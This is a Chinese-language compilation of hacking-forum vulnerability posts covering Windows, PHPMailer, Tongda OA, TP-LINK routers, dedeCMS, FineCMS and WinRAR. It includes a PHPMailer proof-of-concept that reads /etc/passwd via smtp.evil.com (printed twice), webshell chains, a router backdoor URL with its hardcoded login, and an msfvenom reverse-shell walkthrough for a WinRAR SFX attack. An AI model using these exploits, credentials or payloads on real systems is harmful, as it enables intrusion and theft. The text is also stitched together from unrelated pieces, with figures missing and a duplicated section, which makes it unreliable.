Windows操作系统0day漏洞 中国骇客云安全联盟

Windows操作系统

北京时间7月21日消息,据科技网站ZDNet报道,微软周一发布公告称,已发布一项紧急安全补丁以修补一项严重安全漏洞。该漏洞影响范围涵盖所有支持的Windows操作系统,可使黑客接管整个电脑。

微软在公告中称,漏洞存在于该公司开发的OpenType字体中,如果用户打开一个内置OpenType字体的文档或访问内置该字体的非信任网页,黑客将能够利用该漏洞远程执行代码,从而操纵用户电脑。

黑客将能够安装恶意程序,查看、更改或删除用户数据,或创建拥有完全用户权限的新账户。

使用Windows Vista和Windows 7、8、8.1以及平板操作系统Windows RT的用户都将受到影响。除此之外还包括服务器操作系统Windows Server 2008及之后版本。微软发言人在邮件中确认,Windows 10内部预览版也受到了影响。

公告显示,此次软件更新的安全等级为“严重”级别。微软表示,没有证据显示该漏洞被黑客多次利用过。

若用户希望安装该补丁,可查看Windows更新。

据称,谷歌Project Zero团队和网络安全厂商FireEye的研究人员首先发现了该漏洞。

PHPMailer任意文件读取漏洞分析[漏洞]

PHPMailer是堪称全球最流行邮件发送类,其全球范围内的用户量大约有900万,被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等。铱迅安全团队于2017年1月6日发现PHPMailer <= 5.2.21版本存在任意文件读取漏洞,成功利用该漏洞,可获取服务器中的任意文件内容。目前该漏洞已提交官方,并获得修复。

漏洞编号

CVE-2017-5223

影响版本:

PHPMailer <= 5.2.21

漏洞级别:

高危

漏洞详情:

漏洞文件函数: class.phpmailer.php 的encodeFile函数。

该函数中接收了一个$path变量,最后该$path变量的值带入到了file_get_contents函数中执行。如果该$path变量可控即可任意文件读取:

图片1.png

通过跟踪发现AddAttachment 和AddEmbeddedImage 函数最后会调用到encode File函数。 AddAttachment函数的作用是在邮件中发送附件的,如果附件名称可控即可触发该漏洞。

主要来看AddEmbeddedImage函数,该函数是处理邮件内容中的图片的,现在只要$path可控即可触发该漏洞。现在就是寻找可控点:

图片2.png

回溯该函数发现msgHTML函数调用了该函数,msgHTML 函数是用来发送html格式的邮件,调用过程如下:

图片3.png

回溯$filename 看其是否可控,从代码中可以看出$filename是由$url赋值的。即:$filename = basename($url);

再来跟踪$url:

图片4.png

$url是通过解析$message里src=”xxxxx”而来的,$url最终被解析出来就是xxxxx,而$message就是我们发送邮件的自定义的内容。这样可控点就找到了,即可成功利用该漏洞了。

漏洞POC:

<?php  #Author:Yxlinkrequire_once('PHPMailerAutoload.php');$mail = new PHPMailer();$mail->IsSMTP();$mail->Host = "smtp.evil.com";$mail->Port = 25;$mail->SMTPAuth   = true; $mail->CharSet  = "UTF-8";$mail->Encoding = "base64"; $mail->Username = "test@evil.com";  $mail->Password = "tes1234t";  $mail->Subject = "hello"; $mail->From = "test@evil.com";  $mail->FromName = "test";   $address = "testtest@test.com";$mail->AddAddress($address, "test"); $mail->AddAttachment('test.txt','test.txt');  //test.txt可控即可任意文件读取 $mail->IsHTML(true);  $msg="<img src='/etc/passwd'>test";//邮件内容形如这样写。$mail->msgHTML($msg); if(!$mail->Send()) {  echo "Mailer Error: " . $mail->ErrorInfo;} elseecho "Message sent!";}?>

用$msg的内容给自己的邮箱发一封邮件,即可获取到服务器的/etc/passwd的内容。如图:

图片5.png

漏洞修复:

漏洞详情目前已经提交给了PHPMailer官方,官方也已经发布了PHPMailer 5.2.22紧急安全修复,解决上述问题,受影响的用户应当立即升级:

https://github.com/PHPMailer/PHPMailer

详情可参见:

https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md

https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md

通达oa前台注入+后台getshell 0day漏洞中国骇客云报告

注入分析
\inc\common.inc.php

逻辑分析一下,
CheckRequest函数去检查$_REQUEST,通达oa是环境程序一体安装等,php版本是5.3.29,这个时候的$_REQUEST不包含$_COOKIE的,所以可以通过cookie来覆盖变量。

但是有一个很蛋疼的东西就是

strip_tags是没办法处理数组的,所以会返回null,故想覆盖比如_SESSION['a']的话,是没办法的。

接下来看后面的$_COOKIE->$_POST->$_GET,这些都是用SecureRequest函数去检查。然而这个函数只检查了数组键值,=。=,然后还不允许这样以_GET、_POST等开头变量覆盖

看到这段对$_post的处理

=。=,如果传过去一个TD_HTML_EDITOR__SESSION[a]=1,最后不就成了_SESSION[a]=1,还顺便绕过了上面的正则检查。

注入很多,用的是80sec的waf,比如

http://lemon.love:8081/general/document/index.php/send/approve/finish

bypass出数据:

这样就可以跑出管理员密码,这个是用unix加密的,放cmd5解密一下就好了。

上传+包含=>getshell

general\reportshop\utils\upload.php

上传没验证,然后又可以变量覆盖。所以可以直接上传一个php。

exp.html

上传的地址是:xxx/attachment/reportshop/templates/upload.php

但是因为环境是一体的,所以这些上传的目录并没有执行权限。

看到这段运行的。

所以是这样的一个情况,

这样的包含,可以利用zip、phar协议,但是后面还有?&=等符号,一个文件也没发这样创建。

先创建一个upload…..(很多.).php,然后在winhex里面修改它为

 

这样zip协议包含的时候就可以包含到这个文件了。

整理一下利用过程:

  1. 先上传zip文件,里面包含payload
  2. 再上传一个1.txt文件(任意内容都可以,主要是为了进入include包含里面的条件)
  3. 进行包含

kk123.zip

这个zip包含后会生成一个shell,地址是



TP-LINK 路由器后门,TPLINK 存在一个 Shell 调试后门【骇客云漏洞报告】

网上乱逛看到的内容,转了过来,做个记录……

TP-LINK 路由器后门,TPLINK 存在一个 Shell 调试后门,TPLINK WR941N V2_090803 路由器 后门,TP-link路由器后门漏洞。


涉及的

WR740N, WR740ND, WR743ND, WR842ND, WA-901ND, WR941N, WR941ND, WR1043ND, WR2543ND, MR3220, MR3020, WR841N

访问

http://ip/userRpmNatDebugRpm26525557/linux_cmdline.html

用户名:osteam

密码:5up

 

TPLINK WR941N V2_090803 路由器 后门

通过反汇编 TPLINK  WR941N V2_090803的固件 发现存在一个shell调试后门

用户名 osteam  密码 5up

这个后门在httpd程序中还存在,只是页面已经被删除,不知道构造一个页面 提交是否会执行同样的命令呢

以上内容摘自:http://blog.csdn.net/vbvcde/article/details/8242551


TPLink后门+求.bin文件打开方式 。。

safe121 (http://zone.wooyun.org/?do=action&act=thankcontent&id=633) | 2012-12-02 15:10

无聊瞎逛,逛到了

http://ip/userRpmNatDebugRpm26525557/linux_cmdline.html

用手旁的tplink测试一下,成功绕过。。

我想知道他们是怎么发现的这个地址。。

顺便想知道

e@e:~/Desktop$ file wr340*

wr340gv7-cn-up.bin: raw G3 data

raw G3 data 是什么。。在国外网站上只找到一个2005年的帖子。。其他就没有任何东西了。。

求如何反编译。。。用hex之类的都不行。。。估计是加密过的。不过BIN必须要让路由器识别,所以觉得是一个什么算法。。求反编译算法。。

dedeCMS友情链接getshell漏洞分析【中国骇客云漏洞】

在tpl.php中

这里是漏洞利用写入文件的地方,但是我们知道,基本所有的不安全情况,是在数据输入输出时发生的,这里的参数是怎么传递过来的呢?还有$filename和$content是怎么传递参数的呢?继续跟踪
config.php又 include了 common.inc.php ,而一般情况下,类似common.php这种文件名的,里面存放着一些将会经常用到的函数。继续跟踪上去。果然发现了猫腻在common.inc.php 发现了

问题在哪呢? 这段代码大概的意思是 从数组中获取获取参数的方,这里GET,POST,COOKIE方式的参数都有了。

先来跟踪GET,二层循环中$_GET(这个可以看作是一个全局数组)**$_k ,$_v 获取数组的key value值.${$_k}这里全局注册了变量,假如输入GET型参数 ?test=k4l0n.则在本php页及所有包含本页的php页中 , $test的值都被赋值为了kl0n
而tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量写入任意的代码。

继续跟踪 userLogin类的getUserID函数:

userLogin类用户登录

通过跟踪发现,这里没有对管理员的来源页进行任何检查,只是检查了管理员是否登陆,这就造成了一个CSRF漏洞。到这里漏洞思路就很清晰了,由于变量可控漏洞导致可写入任意代码,由于CSRF漏洞诱导管理员以管理员的权限去写入代码。
先上exp:

首先,将这个exp部署在你的服务器上,当然你必须要有一个公网ip,假设你的url为:http://www.xxxx.com/exp.php`
在目标网站的申请友情链接处申请一个友情链接

提交之后等待管理员审核,当管理员审核的时候,一般情况下会点进你的网站看一看

审核的地方在 后台—》模块—》辅助插件—》友情链接

当点这个友情链接的时候,就生成了一句话shell,shell地址在//include/taglib/shell.lib.php

管理员触发了一个链接

这个链接是利用管理员的权限生成了一句话

Finecms 任意文件下载[骇客云漏洞0day]

Author:Sinner
漏洞文件:
\controllers\ApiController.php Line 54

$file 可控。前台的链接如图:

并不用去分析如何加密得来的
我们来看链接是怎么生成的
找到/extensions/function.php Line 285

$url 参数为文件路径
我们本地直接调用这个函数 将我们想下载的文件路径作为参数就能得到下载链接

为/config/config.ini.php

WinRAR 0day漏洞(附利用过程)【中国骇客云联盟漏洞报告】

英国安全机构Mohammad Reza Espargham的漏洞实验室发现,流行压缩工具WinRAR 5.21最新版里存在一个安全漏洞,目前该漏洞还属于零日漏洞,同时官方正在全力修补该漏洞。同时报告该问题的还有Malwarebytes的Pieter Arntz。

英国安全机构Mohammad Reza Espargham的漏洞实验室同时发现当用户打开SFX文件时,攻击者可利用该漏洞远程执行恶意代码。

WinRAR是一个用于压缩和解压缩的应用程序,有超过5亿的设备正在使用同时也是最受欢迎的实用程序之一。因此发现该漏洞时被定性为“高危级”,危险指数9。

攻击者可以利用该漏洞,创建自解压文件同时将恶意HTML代码插入到创建新SFX文件的文字显示窗口中。

利用该漏洞之前攻击者并不需要任何提权措施。在给受害用户发送受感染的文件后,不管何时加载该文档,恶意代码都会正常执行。同时允许攻击者远程查看设备一些信息。需要说明的是, 攻击者利用该漏洞之前并不需要任何提权措施。由于受攻击目标使用SFX文件较为频繁,因此攻击者成功的概率会非常大。

同时如果攻击者不怀好意那么SFX文件一旦被打开,后果将不堪设想。

目前官方正在积极修补该漏洞,同时建议不要打开来源不明的压缩文件,以及随时更新自己的压缩软件。

演示视频:

下面附上本人亲自试验做的例子

环境

Windows7  kali Linux

工具

metasploit

在虚拟机运行kalilinux以及Windows7然后开始监听目标主机

终端输入

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=8080 -f exe >/var/www/html/b.exe

chmod -777 /var/www/html/

打开metasploit

msfconsole

加载利用模块监听目标主机ip 192.168.1.7,端口8080执行

use exploit/multi/handlerset PAYLOADS windows/meterpreter/reverse_tcpset LHOST 192.168.1.7set LPORT 8080exploit

现在到Windows7创建自解压文件

进入高级选项

在文字提示窗口输入恶意代码如下

<iframe src="你定义的目标主机IP以及文件名"></iframe>

然后一直确定就会出现一个文件名称中带有sfx的可执行文件,双击执行之后kali Linux中一直监听目标机器的程序就会出现你目标主机的配置信息。

过程总结

上面模拟了恶意攻击者攻击过程,将放有恶意代码的压缩文件发送给受害者,受害者打开执行压缩文件之后,远程代码同时执行,恶意攻击者就会获取目标主机的信息以及配置情况。

有感兴趣的小伙伴我这里有视频中的代码,可以自己模拟一下

https://packetstormsecurity.com/files/133719/WinRaR-SFX-Remote-Code-Execution.html

参考http://thehackernews.com/2015/09/winrar-vulnerability.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29

https://blog.malwarebytes.org/security-threat/2015/09/latest-winrar-vulnerability-has-yet-to-be-patched/

PHPMailer任意文件读取漏洞分析[骇客云漏洞报告]

PHPMailer是堪称全球最流行邮件发送类,其全球范围内的用户量大约有900万,被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等。铱迅安全团队于2017年1月6日发现PHPMailer <= 5.2.21版本存在任意文件读取漏洞,成功利用该漏洞,可获取服务器中的任意文件内容。目前该漏洞已提交官方,并获得修复。

漏洞编号

CVE-2017-5223

影响版本:

PHPMailer <= 5.2.21

漏洞级别:

高危

漏洞详情:

漏洞文件函数: class.phpmailer.php 的encodeFile函数。

该函数中接收了一个$path变量,最后该$path变量的值带入到了file_get_contents函数中执行。如果该$path变量可控即可任意文件读取:

图片1.png

通过跟踪发现AddAttachment 和AddEmbeddedImage 函数最后会调用到encode File函数。 AddAttachment函数的作用是在邮件中发送附件的,如果附件名称可控即可触发该漏洞。

主要来看AddEmbeddedImage函数,该函数是处理邮件内容中的图片的,现在只要$path可控即可触发该漏洞。现在就是寻找可控点:

图片2.png

回溯该函数发现msgHTML函数调用了该函数,msgHTML 函数是用来发送html格式的邮件,调用过程如下:

图片3.png

回溯$filename 看其是否可控,从代码中可以看出$filename是由$url赋值的。即:$filename = basename($url);

再来跟踪$url:

图片4.png

$url是通过解析$message里src=”xxxxx”而来的,$url最终被解析出来就是xxxxx,而$message就是我们发送邮件的自定义的内容。这样可控点就找到了,即可成功利用该漏洞了。

漏洞POC:

<?php  #Author:Yxlinkrequire_once('PHPMailerAutoload.php');$mail = new PHPMailer();$mail->IsSMTP();$mail->Host = "smtp.evil.com";$mail->Port = 25;$mail->SMTPAuth   = true; $mail->CharSet  = "UTF-8";$mail->Encoding = "base64"; $mail->Username = "test@evil.com";  $mail->Password = "tes1234t";  $mail->Subject = "hello"; $mail->From = "test@evil.com";  $mail->FromName = "test";   $address = "testtest@test.com";$mail->AddAddress($address, "test"); $mail->AddAttachment('test.txt','test.txt');  //test.txt可控即可任意文件读取 $mail->IsHTML(true);  $msg="<img src='/etc/passwd'>test";//邮件内容形如这样写。$mail->msgHTML($msg); if(!$mail->Send()) {  echo "Mailer Error: " . $mail->ErrorInfo;} elseecho "Message sent!";}?>

用$msg的内容给自己的邮箱发一封邮件,即可获取到服务器的/etc/passwd的内容。如图:

图片5.png

漏洞修复:

漏洞详情目前已经提交给了PHPMailer官方,官方也已经发布了PHPMailer 5.2.22紧急安全修复,解决上述问题,受影响的用户应当立即升级:

https://github.com/PHPMailer/PHPMailer

详情可参见:

https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md

https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md[]